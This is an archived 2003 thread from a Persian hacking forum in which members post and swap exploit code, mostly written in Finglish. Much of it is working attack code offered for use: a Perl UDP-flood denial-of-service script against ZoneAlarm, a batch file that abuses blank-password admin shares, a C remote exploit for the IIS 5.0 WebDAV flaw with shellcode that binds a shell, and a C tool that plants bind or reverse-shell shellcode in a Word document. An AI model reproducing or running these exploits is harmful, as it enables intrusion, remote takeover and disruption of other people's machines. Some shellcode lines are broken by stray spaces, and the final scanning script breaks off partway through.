About this Topic [بایگانی] - انجمن گروه آشیانه - آموزش امنیت و راه های مقابله با هک

PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : About this Topic

Behrooz_Ice

09-02-2003, 12:43 AM

salam dostan , in thread ro baraye in baz kardim ke dostani ke ghasd daran news va akhbarhayi az donyaye Hacking va Network Security bedan betonan in karo dar inja anjam bedan . man ghabeliate Attachment ham baraye tamame Memberha dar in topic gozashtam vali khahesh mikonam ke az uploade filehaye por hajm ejtenab konid va bishtar say konid News hayi ke dar morede Hacking va Security hast ra dar inja post konid , agar news haye shoma morede taeide ma gharar begire hatman on News ra ba esme khodeton dar site ashiyane.org gharar midahim .
pishnehade baz kardan va sakhtan in Thread az Reza Faghihie aziz bod ke haminja azash tashakor mikonim .

Movafagh bashid

Behrooz Kamalian

NI3

09-02-2003, 01:11 PM

agha behrooz salam
dastetoon dard nakone man koli hal kardam
pas man az in bebad tamame postamo inja bezanam digeh nah ?
code haye exploite jadid ro man digeh to in ja mizaram
be nazare man ageh ye site digeh ham baz konim behtare
va hmchenin khabareye ashiyane.org ro az 3 ta bekonim 5 ta
thx
babye

NI3

09-03-2003, 01:45 PM

hi
nice dos for all versions of zone alram

ZoneAlarm was found vulnerable to a
# serious vulnerability leading to a
# remote Denial Of Service condition due
# to failure to handle udp random
# packets, if an attacker sends multiple
# udp packets to multiple ports 0-65000,
# the machine will hang up until the
# attacker stop flooding

Operating Systems : ALL Windows

exploit :

#!/usr/bin/perl
use Socket;

system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
&usage
}

my ($target);
$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");

print " DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n Usage : perl $0 <Target>\n\n");}

NI3

09-03-2003, 01:55 PM

FOLDERS.BAT:

CODE

@echo off
@NET USE \\%1\ipc$ "" /user:Administrator""
@NET USE Z: \\%1\c$
@MD Z:\Windows\Desktop\%2\
@NET USE Z: /DELETE
@NET USE \\%1\ipc$ /DELETE

From the command prompt: FOLDERS.BAT [IP ADDRESS] [Folder Name]
e.g. C:\>FOLDERS.BAT 127.0.0.1 Hello

If he's not got a blank password, then you're going to need to break it. I'm not going to help you break passwords. But i'm sure all the info is in the forum.

NI3

09-03-2003, 01:57 PM

Here is the code I,ve modified from xwebdav source code, now you can pass a file.

/*
* IIS 5.0 WebDAV Exploit Xnuxer Lab
* By Schizoprenic, Copyright � 2003
* WebDAV exploit without netcat or telnet and with pretty magic number as RET
* Modified By JFCa, now you can pass a file with ip,s
*/

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

#define RET 0xc9c9
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
FILE *fs;
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\x b1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x 95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x 99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x 99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x 71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\x bc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x 99\xf3"
"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\x d9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\x d9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\x bc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\x bc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x 2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\x b4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x a8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x 68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\x bc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\x bf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x 5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\x d9\x99"
"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\x f3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\x cf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x 09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\x c8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\x bd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\x ca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\x d9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x 99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x 99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\x c9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x 99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\x aa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x 96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x 99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x 99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x 99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\x d9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\x bc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x 0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x 1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x 2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\x c9\x66"
"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x 99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x 99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\x bc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x 1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x 1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x 66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x 70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\x cf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\x c7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x 35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\x da\xd2"
"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\x f7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\x e9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\x f5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\x d7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\x e9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\x f7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\x fa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\x fd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\x f5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\x eb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x 99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\x e1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\x fc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\x f8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\x fe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x 99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x 90\x90";

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n"
"</g:searchrequest>\r\n";

void usage(char *prog)
{
printf("Remote Exploit for IIS 5.0 WebDAV by Xnuxer\n"
"Bug overflow NTDLL.DLL\n"
"Usage: %s FILE\n", prog);
exit(-1);
}

void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;

while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);

if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}

if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}

int xwebdav(char *arg)
{

struct hostent *he;
struct sockaddr_in sock1;
struct sockaddr_in sock2;
unsigned short port;
unsigned long ret=RET;
char buffer[100000];
int sock, sck, h,i,j;

printf("Resolving %s .. ", arg);
if ((he = gethostbyname(arg)) == NULL)
{
fprintf(stderr, "Unknown host\n");
exit(-1);
}

printf("Resolved\n");

port = htons(31337);
port ^= 0x9999;

*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;

bcopy(he->h_addr, &sock1.sin_addr, he->h_length);
sock1.sin_family = AF_INET;
sock1.sin_port = htons(80);

printf("[+] Attacking %s via port: 80\n", arg);

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
return(-1);
}

if (connect(sock, (struct sockaddr *)&sock1, sizeof(sock1)) == -1)
{
perror("Failed to connect");
return(-1);
}

bzero(buffer,100000);
strcpy(buffer,"SEARCH /");

i = strlen(buffer);
buffer[i] = NOP;

for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;

for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;

memcpy(&buffer[j], jumpcode, strlen(jumpcode));
strcpy(buffer+strlen(buffer), " [Only registered and activated users can see links]");
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\n"
"Content-Length: %d\r\n\r\n", arg, strlen(body)
+ strlen(shellcode));
strcpy(buffer+strlen(buffer), body);
memset(buffer+strlen(buffer), 0x01, 1);
memset(buffer+strlen(buffer), NOP, 3);
strcpy(buffer+strlen(buffer), shellcode);

if (send(sock, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
return(-1);
}

printf("[+] Overflow sent, waiting for 5 seconds\n");
sleep(5);

bcopy(he->h_addr, &sock2.sin_addr, he->h_length);
sock2.sin_family = AF_INET;
sock2.sin_port = htons(31337);

printf("[+] Connecting to %s: 31337\n", arg);

if ((sck = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
return(-1);
}

if (connect(sck, (struct sockaddr *)&sock2, sizeof(sock2)) == -1)
{
printf("[+] Unable to connect.\n"
"[+] Exploitation failed, maybe blocked by firewall.\n");
close(sock);
close(sck);
return (-1);
}

close(sock);
printf("[+] Successfull, attempting to join shell ...\n\n");
shell(sck);
return 0;
}
int main (int argc, char **argv)
{
char st[30];
if (argc != 2) usage(argv[0]);
fs=fopen(argv[1],"r");
if(!fs) {printf("Error, File %s not found\n",argv[1]);exit(1);}

while (fscanf(fs,"%s",&st) != EOF){

xwebdav(st);
}

fclose(fs);
exit(0);

NI3

09-07-2003, 12:56 PM

hal konid !!!!!!
-------------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")

/* eip offset for Word 2000 9.0.2812 */
#define EIP_OFFSET 1359

/* eip offset for Word 2000 9.0.4462 SR1 */
//#define EIP_OFFSET 1343

void usage(char *name)
{
printf("\n-- --\n");
printf("-- WordPerfect Document Converter Exploit --\n");
printf("-- --\n\n");
printf("Usage: %s <shell type> <template doc> <os> <port> [<ip>]\n\n", name);
printf("Shell type : 1 - Bind shell (need port)\n");
printf(" 2 - Reverse shell (need ip and port)\n\n");
printf("OS : 1 - Windows 2000 Pro SP3 French\n");
printf(" 2 - Windows NT4 Workstation SP5 French\n");
printf(" 3 - Windows NT4 Workstation SP6 French\n");

exit(1);
}

int main(int argc, char *argv[])
{
unsigned char bindshell[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\x4b\x01\x00\x00\x 89\x06\xff\x36"
"\x68\x8e\x4e\x0e\xec\xe8\x52\x01\x00\x00\x89\x46\x 08\xff\x36\x68"
"\xad\xd9\x05\xce\xe8\x43\x01\x00\x00\x89\x46\x0c\x 68\x6c\x6c\x00"
"\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\x ff\x56\x08\x89"
"\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\x1e\x01\x 00\x00\x89\x46"
"\x10\xff\x36\x68\xef\xce\xe0\x60\xe8\x0f\x01\x00\x 00\x89\x46\x14"
"\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xff\x00\x00\x 00\x89\x46\x18"
"\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xef\x00\x00\x 00\x89\x46\x1c"
"\xff\x76\x04\x68\xa4\x1a\x70\xc7\xe8\xdf\x00\x00\x 00\x89\x46\x20"
"\xff\x76\x04\x68\xa4\xad\x2e\xe9\xe8\xcf\x00\x00\x 00\x89\x46\x24"
"\xff\x76\x04\x68\xe5\x49\x86\x49\xe8\xbf\x00\x00\x 00\x89\x46\x28"
"\xff\x76\x04\x68\xe7\x79\xc6\x79\xe8\xaf\x00\x00\x 00\x89\x46\x2c"
"\x31\xff\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x 00\x00\xff\x56"
"\x18\x50\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x 89\xc3\x57\x57"
"\x68\x02\x00\x22\x11\x89\xe1\x68\x16\x00\x00\x00\x 51\x53\xff\x56"
"\x20\x57\x53\xff\x56\x24\x57\x51\x53\xff\x56\x28\x 89\xc2\x68\x65"
"\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\x66\x30\x81\x c4\xac\xff\xff"
"\xff\x8d\x3c\x24\x31\xc0\x31\xc9\x80\xc1\x15\xab\x e2\xfd\xc6\x44"
"\x24\x10\x44\xfe\x44\x24\x3d\x89\x54\x24\x48\x89\x 54\x24\x4c\x89"
"\x54\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x 41\x51\x49\x51"
"\x51\xff\x76\x30\x51\xff\x56\x10\x89\xe1\x68\xff\x ff\xff\xff\xff"
"\x31\x89\xc1\x57\xff\x56\x14\x56\x64\xa1\x30\x00\x 00\x00\x8b\x40"
"\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e\xc2\x04\x00\x 53\x55\x56\x57"
"\x8b\x6c\x24\x18\x8b\x45\x3c\x8b\x54\x05\x78\x01\x ea\x8b\x4a\x18"
"\x8b\x5a\x20\x01\xeb\xe3\x32\x49\x8b\x34\x8b\x01\x ee\x31\xff\xfc"
"\x31\xc0\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\x eb\xf2\x3b\x7c"
"\x24\x14\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x 4b\x8b\x5a\x1c"
"\x01\xeb\x8b\x04\x8b\x01\xe8\xeb\x02\x31\xc0\x89\x ea\x5f\x5e\x5d"
"\x5b\xc2\x04\x00";

char revshell[] =
"\x66\x81\xec\x80\x00\x89\xe6\xe8\x10\x01\x00\x00\x 89\x06\xff\x36"
"\x68\x8e\x4e\x0e\xec\xe8\x17\x01\x00\x00\x89\x46\x 08\xff\x36\x68"
"\xad\xd9\x05\xce\xe8\x08\x01\x00\x00\x89\x46\x0c\x 68\x6c\x6c\x00"
"\x00\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\x ff\x56\x08\x89"
"\x46\x04\xff\x36\x68\x72\xfe\xb3\x16\xe8\xe3\x00\x 00\x00\x89\x46"
"\x10\xff\x36\x68\x7e\xd8\xe2\x73\xe8\xd4\x00\x00\x 00\x89\x46\x14"
"\xff\x76\x04\x68\xcb\xed\xfc\x3b\xe8\xc4\x00\x00\x 00\x89\x46\x18"
"\xff\x76\x04\x68\xd9\x09\xf5\xad\xe8\xb4\x00\x00\x 00\x89\x46\x1c"
"\xff\x76\x04\x68\xec\xf9\xaa\x60\xe8\xa4\x00\x00\x 00\x89\x46\x20"
"\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\x ff\x56\x18\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x89\xc3\x eb\x03\xff\x56"
"\x14\x68\xc0\xa8\x00\xf7\x68\x02\x00\x22\x11\x89\x e1\x6a\x10\x51"
"\x53\xff\x56\x20\x85\xc0\x75\xe6\x68\x63\x6d\x64\x 00\x89\x66\x30"
"\x81\xc4\xac\xff\xff\xff\x8d\x3c\x24\x31\xc0\x31\x c9\x80\xe9\xeb"
"\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x 89\x5c\x24\x48"
"\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10\x 54\x50\x51\x51"
"\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x 89\xe1\x68\xff"
"\xff\xff\xff\xff\x31\xff\x56\x0c\x89\xc1\xeb\x92\x 56\x64\xa1\x30"
"\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x 08\x5e\xc2\x04"
"\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x 8b\x54\x05\x78"
"\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x 49\x8b\x34\x8b"
"\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\x c1\xcf\x0d\x01"
"\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x 01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x eb\x02\x31\xc0"
"\x89\xea\x5f\x5e\x5d\x5b\xc2\x04\x00";

FILE *docfile;
unsigned short port;
const char *eip;
char targetos[255];
int i;
int bshell;

if (argc <5) {
usage(argv[0]);
}

printf("\n-- --\n");
printf("-- WordPerfect Document Converter Exploit --\n");
printf("-- --\n\n");

/* Shell type */
switch(atoi(argv[1])) {
case 1 : printf("-- Shell type : bind shell\n");
bshell = 1;
break;

case 2 : printf("-- Shell type : reverse shell\n");
bshell = 0;
break;

default : printf("-- Shell type : unknown\n");
exit(1);
}

/* Open template file */
if( (docfile = fopen(argv[2], "r+b")) == NULL) {
printf("-- Can't open file %s\n", argv[2]);

exit(1);
}
else {
printf("-- Template file : \"%s\"\n", argv[2]);
}

/* Customize shellcode */
port = htons(atoi(argv[4]));

if(bshell) {
*(unsigned short *)&bindshell[227] = port;
printf("-- Port : %d\n", atoi(argv[4]));
}
else {
*(unsigned short *)&revshell[185] = port;
printf("-- Port : %d\n", atoi(argv[4]));

*(unsigned int *)&revshell[178] = inet_addr(argv[5]);
printf("-- IP : %s\n", argv[5]);
}

/* Set the return address */
switch(atoi(argv[3])) {
// Windows 2000 Pro SP3 - French
case 1 : sprintf(targetos, "Windows 2000 Pro SP3 - French");
eip = "\xA7\x88\xE2\x77";
break;

// Windows NT4 Workstation SP5 - French
case 2 : sprintf(targetos, "Windows NT4 Workstation SP5 - French");
eip = "\x10\x45\xEB\x77";
break;

// Windows NT4 Workstation SP6 - French
case 3 : sprintf(targetos, "Windows NT4 Workstation SP6 - French");
eip = "\x36\x28\xF3\x77";
break;

// Add your own return address here

default : printf("-- Target OS : unknown\n");
exit(1);
}

printf("-- Target OS : %s\n", targetos);

fseek(docfile, EIP_OFFSET, SEEK_SET);
fwrite(eip, sizeof(eip), 1, docfile);

// Put some nop
for (i=0;i<24;i++) {
fseek(docfile, EIP_OFFSET + 4 + i, SEEK_SET);
fwrite("\x90", sizeof(char), 1, docfile);
}

// Put our shellcode
fseek(docfile, EIP_OFFSET + 28, SEEK_SET);

if(bshell) {
fwrite(bindshell, sizeof(bindshell), 1, docfile);
}
else {
fwrite(revshell, sizeof(revshell), 1, docfile);
}

fclose(docfile);

printf("-- Status : template file modified\n");

if(bshell) {
printf("-- After document execution : nc <ip> %d\n", atoi(argv[4]));
}
else {
printf("-- Before document execution : nc -l -p %d\n", atoi(argv[4]));
}

return 0;
}

NI3

09-07-2003, 12:58 PM

nice util !!!! :D

-------------------------

NI3

09-09-2003, 06:55 PM

hi
-----
* Example:
* $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
* $ mysqlfast 6294b50f67eda209
* Hash: 6294b50f67eda209
* Trying length 3
* Trying length 4
* Found pass: barf
*
* The MySQL password hash function could be strengthened considerably
* by:
* - making two passes over the password
* - using a bitwise rotate instead of a left shift
* - causing more arithmetic overflows
*/

-----

NI3

09-09-2003, 06:59 PM

hi
only compiled but i can give the code

NI3

09-09-2003, 07:00 PM

published Sep 05, 2003
updated Sep 05, 2003
vulnerable FoxWeb FoxWeb 2.5

FoxWeb is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of user-supplied PATH_INFO data to the Foxweb CGI and ISAPI extension. Successful exploitation would permit a remote attacker to execute arbitrary code in the context of the software.

The following exploit was provided:
[Only registered and activated users can see links]

The vendor has reportedly released a patch to address this issue. This has not been confirmed by Symantec. Users should contact the vendor to determine the availability of fixes.

NI3

09-09-2003, 07:07 PM

here is the code i have already send the compiled ver.
babye - urs koosha

dragonscalm

09-09-2003, 10:25 PM

farsi neveshtam
�� ?�� Әی��ی�ی �� ی�ی �� ?�� SQL BruteForce�� ی� �� ی�� ی��ی� �� ی ?�� ی� ��ی� ی�ی �ی�� ی� ��ی� ��یی �� ?��ی� �� ی� �� ی� �� ی� �� ?�� ی� ��ی� ��یی ��

Id man dar oon forum delta force hast albatechand ta id dige ham daram ok ;) vali ghabl az gozashtan file check kon ghabalan hamin ja nazashte bashim hala age mikhay idito to oon forum begoo beminimet

dragonscalm

09-09-2003, 10:29 PM

dar zemn yadam raft begam shoma age be site .net negah mikardid mididi ke hameye exploit hayee ke inja gozashtid ghabalan dar site mojood boode ;) vali az talashet mamnoon vali behtare in talasheto ba ma hamahang koni ke hey 2bare kari nashe energy haroom nashe fekr konam dark mikoni chi migam
ghorbanat cr0ssfire

NI3

09-10-2003, 08:37 PM

hi
ok
chizi nadaram begam :d
babye
vali jane khodam exploit hayi ke man midam hadeghal nesfish inja nabide :d
ok
babye

NI3

09-10-2003, 08:46 PM

rasti id manam onja ni3_boom hast :d
babye

NI3

09-11-2003, 12:40 PM

salam omidvaram ke tekrari nabashe man ke to ashiyane nadidamesh :d
# The script code starts here
#

function dcom_recv(socket)
{
local_var buf, len;

buf = recv(socket:socket, length:10);
if(strlen(buf) != 10)return NULL;

len = ord(buf[8]);
len += ord(buf[9])*256;
buf += recv(socket:socket, length:len - 10);
return buf;
}

port = 135;
if(!get_port_state(port))port = 593;
else {
soc = open_sock_tcp(port);
if(!soc)port = 593;
else close(soc);
}
if(!get_port_state(port))exit(0);

#-------------------------------------------------------------#

function hex2raw(s)
{
local_var i, j, ret;

>for(i=0;i<strlen(s);i+=2)
{
if(ord(s[i]) >= ord("0") && ord(s[i]) <= ord("9"))
j = int(s[i]);
else
j = int((ord(s[i]) - ord("a")) + 10);

j *= 16;
if(ord(s[i+1]) >= ord("0") && ord(s[i+1]) <= ord("9"))
j += int(s[i+1]);
else
j += int((ord(s[i+1]) - ord("a")) + 10);
ret += raw_string(j);
}
return ret;
}

#--------------------------------------------------------------#
function check(req)
{
local_var soc, bindstr, error__code, r;

soc = open_sock_tcp(port);
if(!soc)exit(0);

bindstr = "05000b03100000004800000001000000d016d0160000000001 00000000000100a001000000000000c0000000000000460000 0000045d888aeb1cc9119fe808002b10486002000000";
send(socket:soc, data:hex2raw(s:bindstr));
r = dcom_recv(socket:soc);
if(!r)exit(0);

send(socket:soc, data:req);
r = dcom_recv(socket:soc);
if(!r)return NULL;

close(soc);
error_code = substr(r, strlen� - 4, strlen�);
return error_code;
}

function check2(req)
{
local_var soc,bindstr, error_code, r;

soc = open_sock_tcp(port);
if(!soc)exit(0);

